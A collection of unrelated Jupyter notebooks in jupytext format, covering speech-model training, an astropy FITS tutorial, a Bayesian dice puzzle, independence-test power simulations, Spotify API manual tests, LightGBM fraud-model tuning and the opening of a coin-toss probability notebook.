num_warmup_steps = int(20 * num_update_steps_per_epoch) # Neccessary Number of steps to go from 0.0 to lr
#warmup_scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps, max_steps)
warmup_scheduler = get_polynomial_decay_schedule_with_warmup(optimizer, num_warmup_steps, max_steps, lr_end=1e-7)
reduce_lr_plateau = None
## reduce_lr_plateau = ReduceLROnPlateau(optimizer, factor=0.6, patience=7) ## To define when warmup scheduler is finished
model.zero_grad()
current_total_steps = 0
current_best_wer = 2.0
for epoch in range(n_epochs):
print(f"EPOCH : {epoch}")
tr_loss = 0.0
epoch_step = 0
for step, inputs in enumerate(train_loader):
model.train()
inputs = prepare_inputs(inputs)
loss = compute_loss(model, inputs)
loss.backward()
tr_loss += loss.item()
if hasattr(optimizer, "clip_grad_norm"):
optimizer.clip_grad_norm(1.0)
elif hasattr(model, "clip_grad_norm_"):
model.clip_grad_norm_(1.0)
optimizer.step()
current_total_steps += 1
epoch_step += 1
#if current_total_steps < num_warmup_steps + 1:
#warmup_scheduler.step()
warmup_scheduler.step()
if current_total_steps % print_freq == 0:
print(f"Training Loss : {tr_loss/epoch_step}")
# Initialize the lronplateau as soon as we have finished the warmup
#if reduce_lr_plateau is None and current_total_steps > num_warmup_steps + 1:
#reduce_lr_plateau = ReduceLROnPlateau(optimizer, factor=0.7, patience=5, verbose=1)
model.zero_grad()
if current_total_steps % validation_freq == 0:
world_size = 1
per_score = prediction_loop(valid_loader, model, world_size)
eval_metric = per_score
print(f"ACTUAL PER : {eval_metric}")
if eval_metric < current_best_wer:
print("Hooray! New best wer validation. Saving model")
torch.save(model.state_dict(), os.path.join(parent_dir[i], 'w2v_czech_per_1h.pt'))
current_best_wer = eval_metric
#if reduce_lr_plateau is not None:
#reduce_lr_plateau.step(eval_metric)
# + [markdown] id="zYqZVrSpgaOn"
# # Score on the test set
# + id="h5waSufMl5It" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1616621656185, "user_tz": -60, "elapsed": 188614, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}} outputId="73e752a6-c926-45d4-acf2-c226db3aac93"
model.load_state_dict(torch.load(os.path.join(parent_dir[i], 'w2v_czech_per_1h.pt')))
word_size = 1
sampler_test = trainer_pt_utils.LengthGroupedSampler(common_voice_test, batch_size=32, model_input_name=model_input_name)
test_loader = DataLoader(common_voice_test, batch_size=32, sampler=sampler_test, collate_fn=data_collator, num_workers=4)
per_score = prediction_loop(test_loader, model, world_size)
print(f"The final PER score on the test set is {per_score}")
# + [markdown] id="rerVTFVnkQX9"
# PER_Val = 0.1375119203959974 / PER_Test = 0.17170498951345983
|
exp/czech_notebook_training/W2V_LV/w2v_1h_per_czech_experiment.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Reading and writing FITS files
#
# The [astropy.io.fits](http://docs.astropy.org/en/stable/io/fits/index.html) sub-package provides a way to read, write, and manipulate FITS files. It is one of the oldest packages in Astropy, and started out as the separate PyFITS package.
#
# <section class="objectives panel panel-warning">
# <div class="panel-heading">
# <h2><span class="fa fa-certificate"></span> Objectives</h2>
# </div>
#
#
# <div class="panel-body">
#
# <ul>
# <li>Read image FITS files and access data and header</li>
# <li>Read tabular FITS files and access data and header</li>
# <li>Construct new FITS files from scratch</li>
# </ul>
#
# </div>
#
# </section>
#
# ## Documentation
#
# This notebook only shows a subset of the functionality in astropy.io.fits. For more information about the features presented below as well as other available features, you can read the
# [astropy.io.fits documentation](https://docs.astropy.org/en/stable/io/fits/).
# %matplotlib inline
import matplotlib.pyplot as plt
plt.rc('image', origin='lower')
plt.rc('figure', figsize=(10, 6))
# ## Data
#
# For this tutorial we will be using the ``LMCDensFits1k.fits`` FITS file which was downloaded from http://www.sim.ul.pt/gaia/dr1/gallery/. This file contains the density of sources in the Gaia DR1 release towards the Large Magellanic Cloud (LMC). In addition, we will use the ``gaia_lmc_psc.fits`` file which contains the result of a table query in the GAIA archive.
# ## Reading FITS files and accessing data
#
# To open a FITS file, use the ``fits.open`` function:
# The returned object, ``hdulist``, behaves like a Python list, and each element maps to a Header-Data Unit (HDU) in the FITS file. You can view more information about the FITS file with:
# As we can see, this file contains only one HDU. Accessing this HDU can then either be done by index:
# or by name:
# The ``hdu`` object then has two important attributes: ``data``, which behaves like a Numpy array, can be used to access the data, and ``header``, which behaves like a dictionary, can be used to access the header information. First, we can take a look at the data:
# This tells us that it is a 2-d image. We can now take a peak at the header:
# which shows that this is an Orthographic (``-SIN``) projection in Galactic Coordinates. We can access individual
# header keywords using standard item notation:
# We can now take a look at the data using Matplotlib:
# Note that this is just a plot of an array, so the coordinates are just pixel coordinates at this stage.
#
# Modifying data or header information in a FITS file object is easy. For example we can add new keywords with:
# We can also modify the data by extracting a subset for example:
# and updating the CRPIX values accordingly in the header:
# We can now write out the HDU list back to disk:
# or if you were dealing with a multi-HDU file and wanted to just output the HDU you were editing:
# ## Creating a FITS file from scratch
#
# If you want to create a FITS file from scratch, you need to start off by creating an HDU object:
# and you can then populate the data and header attributes with whatever information you like, for example random data:
# Note that setting the data automatically populates the header with basic information:
# and you should never have to set header keywords such as ``NAXIS``, ``NAXIS1``, and so on manually. We can then set additional header keywords:
# and we can then write out the FITS file to disk:
# ## Convenience functions
#
# In cases where you just want to access the data or header in a specific HDU, you can use the following convenience functions:
# You can optionally specify the index or name of the HDU to look at (which is important if you are dealing with a multi-HDU file):
# and similarly for ``getheader``.
# ## Accessing Tabular Data
#
# Let's now take a look at a tabular dataset - this is a subset of sources from the GAIA DR1 release around the LMC, and only includes the brightest sources in Gmag:
# Here we have two HDUs - the first one is mostly empty and the second contains the table (the primary HDU can't contain a table in general).
#
# Tabular data behaves very similarly to image data such as that shown above, but the data array is a structured Numpy array:
#
# <section class="challenge panel panel-success">
# <div class="panel-heading">
# <h2><span class="fa fa-pencil"></span> Challenge</h2>
# </div>
#
#
# <div class="panel-body">
#
# <ol>
# <li>Examine the headers of the first and second HDU in the point source catalog and try adding new keywords to them or changing them</li>
# <li>Make a histogram of the G-band magnitude of the sources in the catalog - can you figure out what the upper limit for Gmag was when the table was selected?</li>
# <li>Make a plot of the position of the sources on the sky in the point source catalog, in Galactic coordinates l and b (you will need to use what we learned about SkyCoord in the previous tutorial)</li>
# <li>Try and produce a new FITS file that contains the image in the primary HDU and the above table in the second HDU</li>
# </ol>
#
# </div>
#
# </section>
#
# <center><i>This notebook was written by <a href="https://aper<EMAIL>/">Aperio Software Ltd.</a> © 2019, and is licensed under a <a href="https://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License (CC BY 4.0)</a></i></center>
#
# 
|
04-fits.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Think Bayes
#
# This notebook presents example code and exercise solutions for Think Bayes.
#
# Copyright 2018 <NAME>
#
# MIT License: https://opensource.org/licenses/MIT
# +
# Configure Jupyter so figures appear in the notebook
# %matplotlib inline
# Configure Jupyter to display the assigned value after an assignment
# %config InteractiveShell.ast_node_interactivity='last_expr_or_assign'
# import classes from thinkbayes2
from thinkbayes2 import Pmf, Suite
import thinkbayes2
import thinkplot
# -
# ### The Dungeons and Dragons club
#
# Suppose there are 10 people in my *Dungeons and Dragons* club; on any game day, each of them has a 70% chance of showing up.
#
# Each player has one character and each character has 6 attributes, each of which is generated by rolling and adding up 3 6-sided dice.
#
# At the beginning of the game, I ask whose character has the lowest attribute. The wizard says, "My constitution is 5; does anyone have a lower attribute?", and no one does.
#
# The warrior says "My strength is 16; does anyone have a higher attribute?", and no one does.
#
# How many characters are in the party?
# ### The prior
#
# There are three ways to compute the prior distribution:
#
# * Simulation
#
# * Convolution
#
# * Analytic distribution
#
# First, simulation. Here's a function that flips a coin with probability `p`:
# +
from random import random
def flip(p):
return random() < p
# -
# We can use it to flip a coin for each member of the club.
flips = [flip(0.7) for i in range(10)]
# And count the number that show up on game day.
sum(flips)
# Let's encapsulate that in a function that simulates a game day.
def game_day(n, p):
flips = [flip(p) for i in range(n)]
return sum(flips)
game_day(10, 0.7)
# If we run that function many times, we get a sample from the distribution of the number of players.
sample = [game_day(10, 0.7) for i in range(1000)]
pmf_sample = Pmf(sample)
thinkplot.Hist(pmf_sample)
# The second method is convolution. Instead of flipping a coin, we can create a `Pmf` object that represents the distribution of outcomes from a single flip.
def coin(p):
return Pmf({1:p, 0:1-p})
# Here's what it looks like.
player = coin(0.7)
player.Print()
# If we have two players, there are three possible outcomes:
(player + player).Print()
# If we have 10 players, we can get the prior distribution like this:
prior = sum([player]*10)
prior.Print()
# Now we can compare the results of simulation and convolution:
# +
thinkplot.Hist(pmf_sample, color='C0')
thinkplot.Pmf(prior, color='C1')
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
# -
# Finally, we can use an analytic distribution. The distribution we just computed is the [binomial distribution](https://en.wikipedia.org/wiki/Binomial_distribution), which has the following PMF:
#
# $ PMF(k; n, p) = P(k ~|~ n, p) = {n \choose k}\,p^{k}(1-p)^{n-k}$
#
# We could evalate the right hand side in Python, or use `MakeBinomialPmf`:
#
#
help(thinkbayes2.MakeBinomialPmf)
# And we can confirm that the analytic result matches what we computed by convolution.
# +
binomial = thinkbayes2.MakeBinomialPmf(10, 0.7)
thinkplot.Pmf(prior, color='C1')
thinkplot.Pmf(binomial, color='C2', linestyle='dotted')
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
# -
# Since two players spoke, we can eliminate the possibility of 0 or 1 players:
# +
thinkplot.Pmf(prior, color='gray')
del prior[0]
del prior[1]
prior.Normalize()
thinkplot.Pmf(prior, color='C1')
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
# -
# ### Likelihood
#
# There are three components of the likelihood function:
#
# * The probability that the highest attribute is 16.
#
# * The probability that the lowest attribute is 5.
#
# * The probability that the lowest and highest attributes are held by different players.
#
# To compute the first component, we have to compute the distribution of the maximum of $6n$ attributes, where $n$ is the number of players.
#
# Here is the distribution for a single die.
d6 = Pmf([1,2,3,4,5,6])
d6.Print()
# And here's the distribution for the sum of three dice.
thrice = sum([d6] * 3)
thinkplot.Pdf(thrice)
thinkplot.decorate(xlabel='Attribute',
ylabel='PMF')
# Here's the CDF for the sum of three dice.
cdf_thrice = thrice.MakeCdf()
thinkplot.Cdf(cdf_thrice)
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF')
# The `Max` method raises the CDF to a power. So here's the CDF for the maximum of six attributes.
cdf_max_6 = cdf_thrice.Max(6)
thinkplot.Cdf(cdf_max_6)
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Maximum of 6 attributes')
# If there are `n` players, there are `6*n` attributes. Here are the distributions for the maximum attribute of `n` players, for a few values of `n`.
# +
for n in range(2, 10, 2):
cdf_max = cdf_thrice.Max(n*6)
thinkplot.Cdf(cdf_max, label='n=%s'%n)
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Maximum of 6*n attributes')
# -
# To check that, I'll compute the CDF for 7 players, and estimate it by simulation.
# +
n = 7
cdf = cdf_thrice.Max(n*6)
thinkplot.Cdf(cdf, label='n=%s'%n)
sample_max = [max(cdf_thrice.Sample(42)) for i in range(1000)]
thinkplot.Cdf(thinkbayes2.Cdf(sample_max), label='sample')
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Maximum of 6*n attributes')
# -
# Looks good.
#
# Now, to compute the minimum, I have to write my own function, because `Cdf` doesn't provide a `Min` function.
def compute_cdf_min(cdf, k):
"""CDF of the min of k samples from cdf.
cdf: Cdf object
k: number of samples
returns: new Cdf object
"""
cdf_min = cdf.Copy()
cdf_min.ps = 1 - (1 - cdf_min.ps)**k
return cdf_min
# Now we can compute the CDF of the minimum attribute for `n` players, for several values of `n`.
# +
for n in range(2, 10, 2):
cdf_min = compute_cdf_min(cdf_thrice, n*6)
thinkplot.Cdf(cdf_min, label='n=%s'%n)
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Minimum of 6*n attributes')
# -
# And again we can check it by comparing to simulation results.
# +
n = 7
cdf = compute_cdf_min(cdf_thrice, n*6)
thinkplot.Cdf(cdf, label='n=%s'%n)
sample_min = [min(cdf_thrice.Sample(42)) for i in range(1000)]
thinkplot.Cdf(thinkbayes2.Cdf(sample_min), label='sample')
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Minimum of 6*n attributes')
# -
# For efficiency and conciseness, it is helpful to precompute the distributions for the relevant values of `n`, and store them in dictionaries.
# +
like_min = {}
like_max = {}
for n in range(2, 11):
cdf_min = compute_cdf_min(cdf_thrice, n*6)
like_min[n] = cdf_min.MakePmf()
cdf_max = cdf_thrice.Max(n*6)
like_max[n] = cdf_max.MakePmf()
print(like_min[n][5], like_max[n][16])
# -
# The output shows that the particular data we saw is symmetric: the chance that 16 is the maximum is the same as the chance that 5 is the minimum.
#
# Finally, we need the probability that the minimum and maximum are held by the same person. If there are `n` players, there are `6*n` attributes.
#
# Let's call the player with the highest attribute Max. What is the chance that Max also has the lowest attribute? Well Max has 5 more attributes, out of a total of `6*n-1` remaining attributes.
#
# So here's `prob_same` as a function of `n`.
# +
def prob_same(n):
return 5 / (6*n-1)
for n in range(2, 11):
print(n, prob_same(n))
# -
# ### The update
# Here's a class that implements this likelihood function.
class Dungeons(Suite):
def Likelihood(self, data, hypo):
"""Probability of the data given the hypothesis.
data: lowest attribute, highest attribute, boolean
(whether the same person has both)
hypo: number of players
returns: probability
"""
lowest, highest, same = data
n = hypo
p = prob_same(n)
like = p if same else 1-p
like *= like_min[n][lowest]
like *= like_max[n][highest]
return like
# Here's the prior we computed above.
suite = Dungeons(prior)
thinkplot.Hist(suite)
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
suite.Mean()
# And here's the update based on the data in the problem statement.
suite.Update((5, 16, False))
# Here's the posterior.
thinkplot.Hist(suite)
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
suite.Mean()
suite.Print()
# Based on the data, I am 94% sure there are between 5 and 9 players.
suite.CredibleInterval()
sum(suite[n] for n in [5,6,7,8,9])
|
examples/dungeons_soln.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import sys, os
from joblib import Parallel, delayed
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from hyppo.tools import power
# +
sys.path.append(os.path.realpath('..'))
sns.set(color_codes=True, style='white', context='talk', font_scale=1.5)
PALETTE = sns.color_palette("Set1")
sns.set_palette(PALETTE[1:5] + PALETTE[6:], n_colors=9)
POWER_REPS = 5
SIMULATIONS = {
# "linear": ("Linear", 1000),
# "exponential": ("Exponential", 1000),
# "cubic": ("Cubic", 1000),
# "joint_normal": ("Joint Normal", 10),
# "step": ("Step", 20),
# "quadratic": ("Quadratic", 20),
# "w_shaped": ("W-Shaped", 20),
# "spiral": ("Spiral", 20),
# "uncorrelated_bernoulli": ("Bernoulli", 100),
"logarithmic": ("Logarithmic", 100),
# "fourth_root": ("Fourth Root", 20),
# "sin_four_pi": ("Sine 4\u03C0", 10),
# "sin_sixteen_pi": ("Sine 16\u03C0", 10),
# "square": ("Square", 40),
# "two_parabolas": ("Two Parabolas", 20),
# "circle": ("Circle", 20),
# "ellipse": ("Ellipse", 20),
# "diamond": ("Diamond", 40),
# "multiplicative_noise": ("Multiplicative", 10),
"multimodal_independence": ("Independence", 100)
}
TESTS = [
["MaxMargin", "Dcorr"],
# "KMERF",
# "MGC",
# "Dcorr",
# "Hsic",
# "HHG",
# "CCA",
# "RV",
]
# -
def find_dim_range(dim):
lim = 10 if dim < 20 else 20
dim_range = list(range(int(dim/lim), dim+1, int(dim/lim)))
if int(dim/lim) != 1:
dim_range.insert(0, 1)
return dim_range
def estimate_power(sim, test):
dim_range = find_dim_range(SIMULATIONS[sim][1])
est_power = np.array(
[
np.mean(
[
power(test, sim_type="indep", sim=sim, n=100, p=i, noise=False, auto=True)
for _ in range(POWER_REPS)
]
)
for i in dim_range
]
)
test = test[0] if type(test) is list else test
np.savetxt(
"../max_margin/vs_dimension/{}_{}.csv".format(sim, test),
est_power,
delimiter=",",
)
return est_power
outputs = Parallel(n_jobs=-1, verbose=100)(
[delayed(estimate_power)(sim, test) for sim in SIMULATIONS.keys() for test in TESTS]
)
def plot_power():
fig, ax = plt.subplots(nrows=4, ncols=5, figsize=(25, 20))
plt.suptitle(
"Multivariate Independence Testing (Increasing Dimension)",
y=0.93,
va="baseline",
)
for i, row in enumerate(ax):
for j, col in enumerate(row):
count = 5 * i + j
if count in [9, 18, 19]:
continue
sim = list(SIMULATIONS.keys())[count]
for test in TESTS:
title, dim = SIMULATIONS[sim]
dim_range = find_dim_range(dim)
test = test[0] if type(test) is list else test
power = np.genfromtxt(
"../max_margin/vs_dimension/{}_{}.csv".format(sim, test),
delimiter=",",
)
kwargs = {
"label": test,
"lw": 2,
}
if test in ["MaxMargin"]:
kwargs["color"] = "#e41a1c"
kwargs["lw"] = 4
col.plot(dim_range, power, **kwargs)
col.set_xticks([dim_range[0], dim_range[-1]])
col.set_ylim(-0.05, 1.05)
col.set_yticks([])
if j == 0:
col.set_yticks([0, 1])
col.set_title(title)
fig.text(0.5, 0.07, "Dimension", ha="center")
fig.text(
0.07,
0.5,
"Absolute Power",
va="center",
rotation="vertical",
)
leg = plt.legend(
bbox_to_anchor=(0.5, 0.07),
bbox_transform=plt.gcf().transFigure,
ncol=len(TESTS),
loc="upper center",
)
leg.get_frame().set_linewidth(0.0)
for legobj in leg.legendHandles:
legobj.set_linewidth(5.0)
plt.subplots_adjust(hspace=0.50)
plt.savefig(
"../max_margin/figs/indep_power_dimension.pdf", transparent=True, bbox_inches="tight"
)
plot_power()
|
max_margin/indep_power_dimension.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
import os
import json
import spotipy as sp
from spotipy.oauth2 import SpotifyOAuth
from pprint import pprint
import random
# +
SPOTIFY_USER_ID = os.environ.get("SPOTIFY_USER_ID")
SPOTIFY_CLIENT_ID = os.environ.get("SPOTIFY_CLIENT_ID")
SPOTIFY_CLIENT_SECRET = os.environ.get("SPOTIFY_CLIENT_SECRET")
SPOTIFY_REDIRECT_URI = os.environ.get("SPOTIFY_REDIRECT_URI")
states = [
"user-modify-playback-state",
"user-read-playback-state",
"user-library-read",
"playlist-read-private",
"playlist-read-collaborative",
"playlist-modify-public",
"playlist-modify-private",
"user-read-recently-played",
]
STATE_STR = " ".join(states)
# -
sp_auth = sp.Spotify(
auth_manager=SpotifyOAuth(
client_id=SPOTIFY_CLIENT_ID,
client_secret=SPOTIFY_CLIENT_SECRET,
redirect_uri=SPOTIFY_REDIRECT_URI,
scope=STATE_STR
)
)
sp_auth.devices()
playlist_items = sp_auth.playlist_items(fields="items(track(album(album_type,type,artists(name),name,total_tracks,uri,release_date)))", playlist_id="https://open.spotify.com/playlist/37i9dQZEVXbieEVQVJcsiF?si=0839594a9c684a3c")
pprint(playlist_items["items"][0])
sp_auth.current_user_saved_albums_contains(albums=['spotify:album:492aRRC7C55aoT9NX7NrxJ'])
def get_artist_names(res):
"""
Retrieves all artist names for a given input to the "album" key of a response.
"""
artists = []
for artist in res["artists"]:
artists.append(artist["name"])
artists_str = ", ".join(artists)
return artists_str
# +
# %%time
from tabulate import tabulate
# check_url_format(url)
# playlist_items = sp_auth.playlist_items(playlist_id=url, fields=fields)
album_items = []
index = 0
for item in playlist_items["items"]:
item_album = item["track"]["album"]
if item_album["total_tracks"] > 1 and item_album["album_type"] == "single":
is_album_saved = sp_auth.current_user_saved_albums_contains(albums=[item_album["uri"]])
if is_album_saved[0]:
album_items.append(
{
"index": index,
"artists": get_artist_names(item_album),
"album": item_album["name"],
"album_type": "EP",
"album_uri": item_album["uri"],
"release_date": item_album["release_date"],
"total_tracks": item_album["total_tracks"]
}
)
index += 1
elif item_album["album_type"] == "album":
is_album_saved = sp_auth.current_user_saved_albums_contains(albums=[item_album["uri"]])
if is_album_saved[0]:
album_items.append(
{
"index": index,
"artists": get_artist_names(item_album),
"album": item_album["name"],
"album_type": item_album["album_type"],
"album_uri": item_album["uri"],
"release_date": item_album["release_date"],
"total_tracks": item_album["total_tracks"]
}
)
index += 1
# click.echo(tabulate(album_items, headers="keys", tablefmt="github"))
album_items
# +
# %%time
from tabulate import tabulate
# check_url_format(url)
# playlist_items = sp_auth.playlist_items(playlist_id=url, fields=fields)
album_items = []
index = 0
for item in playlist_items["items"]:
item_album = item["track"]["album"]
is_album_saved = sp_auth.current_user_saved_albums_contains(albums=[item_album["uri"]])
if is_album_saved[0]:
if item_album["total_tracks"] > 1 and item_album["album_type"] == "single":
album_items.append(
{
"index": index,
"artists": get_artist_names(item_album),
"album": item_album["name"],
"album_type": "EP",
"album_uri": item_album["uri"],
"release_date": item_album["release_date"],
"total_tracks": item_album["total_tracks"]
}
)
index += 1
elif item_album["album_type"] == "album":
is_album_saved = sp_auth.current_user_saved_albums_contains(albums=[item_album["uri"]])
if is_album_saved[0]:
album_items.append(
{
"index": index,
"artists": get_artist_names(item_album),
"album": item_album["name"],
"album_type": item_album["album_type"],
"album_uri": item_album["uri"],
"release_date": item_album["release_date"],
"total_tracks": item_album["total_tracks"]
}
)
index += 1
# click.echo(tabulate(album_items, headers="keys", tablefmt="github"))
album_items
# -
playback = sp_auth.current_playback()
pprint(playback)
sp_auth.transfer_playback(device_id='884b71d1e7db094099a4975f0ddfefb7d10fc8c7', force_play=True)
f = open("current_playback_res.json", "w")
f.write(json.dumps(current_playback, indent=4))
f.close()
from spoticli.util import get_current_playback, convert_ms, convert_datetime
from pathlib import Path
# +
path = Path("../../test/unit/artifacts/current_playback_res.json")
f = open(path)
res = json.load(f)
get_current_playback(res, False)
# -
convert_ms(600000)
convert_datetime("20210813 20:01")
convert_datetime("20200403 13:37")
"<NAME> & The Indications, <NAME>"[0:35]
playback = {}
import json
|
tests/manual/Manual Tests.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Training LightGBM on the fraud dataset.
# - SMOTE for Upsampling
# - F1 score for metric
# - using early stopping
# - Hyperopt for hyperparameter optimization
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from imblearn.over_sampling import SMOTE, ADASYN, BorderlineSMOTE, SVMSMOTE
from imblearn.combine import SMOTETomek, SMOTEENN
import lightgbm as lgb
import sklearn
from hyperopt import fmin, tpe, hp, Trials, STATUS_OK
from sklearn.metrics import f1_score
x_train = pd.read_csv('./data/x_train.csv').values
y_train = pd.read_csv('./data/y_train.csv').values[:,0]
x_test = pd.read_csv('./data/x_test.csv').values
y_test = pd.read_csv('./data/y_test.csv').values[:,0]
# +
x_train_resampled, y_train_resampled = SMOTE(random_state = 42).fit_resample(x_train, y_train)
print('#pos labels unsampled:', sum(y_train == 1))
print('#neg labels unsampled::', sum(y_train == 0))
print('#pos labels resampled:', sum(y_train_resampled == 1))
print('#neg labels resampled::', sum(y_train_resampled == 0))
# -
train_data = lgb.Dataset(x_train_resampled, label=y_train_resampled)
test_data = lgb.Dataset(x_test, label=y_test)
def lgb_f1_score(y_hat, data):
y_true = data.get_label()
y_hat = np.round(y_hat) # scikits f1 doesn't like probabilities
return 'f1', f1_score(y_true, y_hat), True
# +
def objective(params):
#print(params)
evals_result = {}
num_leaves = int(params['num_leaves'])
min_data_in_leaf = int(params['min_data_in_leaf'])
max_bin = int(params['max_bin'])
bagging_fraction = params['bagging_fraction']
bagging_freq = int(params['bagging_freq'])
feature_fraction = params['feature_fraction']
lambda_l2 = params['lambda_l2'],
min_gain_to_split = params['min_gain_to_split']
param = {'num_leaves':num_leaves,
'min_data_in_leaf':min_data_in_leaf,
'max_bin':max_bin,
'learning_rate':0.1,
'num_trees':1000,
'objective':'binary',
'bagging_fraction':bagging_fraction,
'bagging_freq':bagging_freq,
'feature_fraction':feature_fraction,
'verbose':-1,
'lambda_l2':lambda_l2,
'min_gain_to_split':min_gain_to_split,
#'metric' : 'binary_logloss' # map, MAP, aliases: mean_average_precision
}
bst = lgb.train(param,
train_data,
valid_sets=[test_data],
early_stopping_rounds=15,
verbose_eval=False,
feval=lgb_f1_score,
evals_result=evals_result,
)
f1 = max(evals_result['valid_0']['f1'])
return -f1
# +
trials = Trials()
space = {
'num_leaves' : hp.quniform('num_leaves', 100, 600, 10),
'min_data_in_leaf' : hp.quniform('min_data_in_leaf', 10, 30, 1),
'max_bin' : hp.quniform('max_bin', 200, 2000, 10),
'bagging_fraction' : hp.uniform('bagging_fraction', 0.01, 1.0),
'bagging_freq' : hp.quniform('bagging_freq', 0, 10, 1),
'feature_fraction' : hp.uniform('feature_fraction', 0.5, 1.0),
'lambda_l2' : hp.uniform('lambda_l2', 0.0, 80.0),
'min_gain_to_split' : hp.uniform('min_gain_to_split', 0.0, 1.0),
}
best = fmin(objective,
space=space,
algo=tpe.suggest,
trials=trials,
max_evals=800)
print('#best', best)
print('#min(trials.losses())', min(trials.losses()))
# +
#16%|█▌ | 125/800 [11:27<1:14:11, 6.59s/it, best loss: -0.8469387755102041]
#19%|█▉ | 153/800 [14:15<1:11:37, 6.64s/it, best loss: -0.8514851485148514]
#20%|██ | 160/800 [15:07<1:18:03, 7.32s/it, best loss: -0.8571428571428571]
#40%|████ | 321/800 [31:41<52:51, 6.62s/it, best loss: -0.8615384615384615]
#60%|█████▉ | 479/800 [47:53<34:38, 6.48s/it, best loss: -0.864321608040201]
#90%|█████████ | 724/800 [1:13:52<09:38, 7.61s/it, best loss: -0.8659793814432989]
#100%|██████████| 800/800 [1:22:28<00:00, 6.72s/it, best loss: -0.8659793814432989]
#best {'bagging_fraction': 0.7589063217431224, 'bagging_freq': 3.0, 'feature_fraction': 0.9971560184326493, 'lambda_l2': 0.03681947685513025, 'max_bin': 1970.0, 'min_data_in_leaf': 30.0, 'min_gain_to_split': 0.00047339850140067086, 'num_leaves': 500.0}
#min(trials.losses()) -0.8659793814432989
|
LightGBM_with_Hyperopt.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# To properly render this notebook go to:
# [nbviewer](https://nbviewer.jupyter.org/github/mtzoufras/probabilities/blob/master/Consecutive_heads.ipynb)
# ### <font color='red'>What is the probability P of getting N consecutive heads at least once in K tosses of a fair coin?</font>
#
# __Quick answer:__ The exact result is $P=1-F_{K+2}^{(N)}/2^K$, where $F_{K+2}^{(N)}$ is the Fibonacci N-step number. For a good approximation I calculate $x = \frac{K-N+2}{2^{N+1}}$ and if $x\lesssim 0.1$ then $P\simeq x$, else $P\simeq 1-e^{-x}$.
#
# __Corollary:__ This yields an approximate expression for the Fibonacci N-step number: $F_{K+2}^{(N)} \simeq 2^K \exp\left(-\frac{K-N+2}{2^{N+1}}\right)$
#
# ### Introduction
#
# This question shows up a lot online. For example:
# * Quora:
# * [Run of 5 in 11](https://www.quora.com/What-is-the-probability-of-getting-5-consecutive-heads-in-11-tosses-of-a-fair-coin)
# * [Run of 5 in 10](https://www.quora.com/What-is-the-probability-of-getting-5-consecutive-heads-in-10-tosses-of-a-fair-coin)
# * PhysicsForums:
# * [Run of 15 in 40](https://www.physicsforums.com/threads/what-is-the-probability-of-getting-15-or-more-consecutive-heads-over-40-coin-tosses.331603/)
# * Math.StackExchange:
# * [Run of 20 in 100](https://math.stackexchange.com/questions/417762/probability-of-20-consecutive-success-in-100-runs)
# * [Run of 7 in 150](https://math.stackexchange.com/questions/4658/what-is-the-probability-of-a-coin-landing-tails-7-times-in-a-row-in-a-series-of)
# * DrDobbs:
# * [Run of 20 in 1,000,000](http://www.drdobbs.com/architecture-and-design/20-heads-in-a-row-what-are-the-odds/229300217)
#
# The answer is usually given in terms of the [_Fibonacci N-step_](http://mathworld.wolfram.com/Fibonaccin-StepNumber.html) sequence. The derivation is straightforward (see the Appendix at the bottom) but since the Fibonacci is not an explicit function of the variables N and K the resulting formula is very opaque. Here I will show a couple of simple semi-analytical (...) expressions and discuss their accuracy:
# 1. $P \simeq 1 - \exp\left(-\frac{K-N+2}{2^{N+1}}\right)$, with accuracy that generally improves with increasing $N,K$
# 2. If $\frac{K-N+2}{2^{N+1}}\ll 1$ then $P \simeq \frac{K-N+2}{2^{N+1}}$.
#
# Before proceeding let's see what these expressions predict for the aforementioned examples:
# +
import numpy as np
import plotly.plotly as py
import plotly.figure_factory as ff
def fiblike(start):
"""A function that returns a Fibonacci N-step function, where N
is the length of the input list "start". Code from rosettacode.org"""
addnum = len(start)
memo = start[:]
def fibber(n):
try:
return memo[n]
except IndexError:
ans = sum(fibber(i) for i in range(n-addnum, n))
memo.append(ans)
return ans
return fibber
def Fibonacci_formatted(_N,_K):
"""Formatted result from Fibonacci(N,K) calculation for use below"""
Fibonacci = fiblike([1] + [2**i for i in range(_N-1)])
return '$'+str(float('%.4g' % (
1-Fibonacci(_K+1)/float(2**_K) ))*100.0)+'\%$'
def Taylor_formatted(_N,_K):
"""Formatted result from Taylor expansion for use below"""
